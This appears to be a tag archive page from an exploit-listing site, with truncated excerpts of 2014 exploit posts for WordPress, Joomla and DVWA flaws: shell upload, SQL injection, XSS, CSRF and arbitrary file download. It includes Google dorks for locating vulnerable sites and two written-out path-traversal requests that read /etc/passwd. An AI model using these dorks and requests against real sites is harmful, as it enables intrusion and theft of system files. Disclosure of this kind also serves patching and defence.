Tags archives: php

DVWA Cross Site Request Forgery

There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to first reset the DVWA database of the victim, then make the victim log in using the default resets, next craft another CSRF to change the challenge level to low to make exploitation more probable, then use these to craft a command [...]

WordPress Slideshow Gallery 1.4.6 Shell Upload

#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo – http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani – info@homelab.it – http://www.homelab.it
#
#
# Disclaimer:
#
# This [...]

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities
Author: Milhouse
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus

Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11

Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details: The plugin echoes the value of the [...]

Joomla Spider Form Maker 4.3 SQL Injection

######################
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/products/joomla-form.html
# Dork Google: inurl:com_formmaker
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
# Linux [...]

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y’all.

Ninja Forms v2.77 – Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 – Email header injection
WP to Twitter v2.9.3 – Authorization bypass (regular users can tweet to the admin’s twitter account)
Xhanch – My Twitter v2.7.7 – CSRF (create and delete tweets) [...]

WordPress Spider Facebook 1.0.8 SQL Injection

######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap [...]

WordPress Like Dislike Counter 1.2.3 SQL Injection

#################################################################################################
#
# Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk : High+/Critical
# Exploit Author : XroGuE
# Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version : 1.2.3
# Plugin Name : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home : www.wpfruits.com
# Date : [...]

WordPress Bulk Delete Users By Email 1.0 CSRF

# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 – CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil – fikri.fadzil@impact-alliance.org
# Vendor Homepage – http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP

Description: This plugin will allow administrator to delete user(s) account [...]

WordPress Urban City Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|————————————————————————-|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability |
|[*] Google Dork: inurl:wp-content/themes/urbancity |
|[*] Date : 2014-09-07 |
|[*] Exploit Author: Ashiyane Digital Security Team |
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/ |
|[*] Tested on: Windows 7 |
|————————————————————————-|
| |
|[*] Location : [localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd |
|————————————————————————-|
|[*] Proof: | [...]

WordPress Epic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|————————————————————————-|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability |
|[*] Google Dork: inurl:wp-content/themes/epic |
|[*] Date : 2014-09-07 |
|[*] Exploit Author: Ashiyane Digital Security Team |
|[*] Vendor Homepage : http://www.organizedthemes.com/epic |
|[*] Tested on: Windows 7 |
|————————————————————————-|
| |
|[*] Location : [localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd |
|————————————————————————-|
|[*] Proof: | [...]